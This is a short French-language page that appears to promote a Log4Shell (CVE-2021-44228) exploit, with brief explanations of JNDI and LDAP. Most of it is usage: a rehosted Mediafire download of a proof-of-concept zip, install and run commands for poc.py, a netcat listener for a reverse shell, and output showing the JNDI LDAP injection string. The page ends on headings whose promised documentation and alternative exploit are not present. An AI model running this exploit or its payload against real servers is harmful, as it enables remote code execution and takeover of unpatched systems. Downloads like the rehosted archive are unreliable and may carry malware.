
Outil d'exploitation pour CVE-2021-44228 (Log4Shell) qui configure un serveur LDAP malveillant et livre une charge utile Java pour réaliser une exécution de code à distance sur des applications Log4j vulnérables.
Outil de test de vulnérabilité Log4Shell https://log4shell.tools/
Exploit avec Java déjà inclus, pour éviter de créer un compte, etc..
http://www.mediafire.com/file/bs1spnysc6fbz1a/log4j-shell-poc_%25281%2529.zip/file
pip install -r requirements.txt
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
nc -lvnp 9001
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
[+] Exploit java class created success
[+] Setting up fake LDAP server
[+] Send me: ${jndi:ldap://localhost:1389/a}
Listening on 0.0.0.0:1389
Concepts de base de log4j
Qu'est-ce que JNDI
C'est une interface Java API pour un service d'annuaire qui permet aux clients logiciels Java de découvrir et de rechercher des données et des ressources via un nom
Qu'est-ce que LDAP
C'est un protocole d'accès à l'annuaire. LDAP peut être utilisé pour valider les noms d'utilisateur et mots de passe avec les serveurs Docker, Jenkins, Kubernetes, Open VPN et Linux Samba. L'authentification unique LDAP peut également être utilisée par les administrateurs système pour contrôler l'accès à une base de données LDAP.
POUR CEUX QUI VEULENT EN SAVOIR PLUS SUR LA VULNÉRABILITÉ, VOICI LA DOC CI-DESSOUS:
EXPLOIT SANS JAVA INCLUS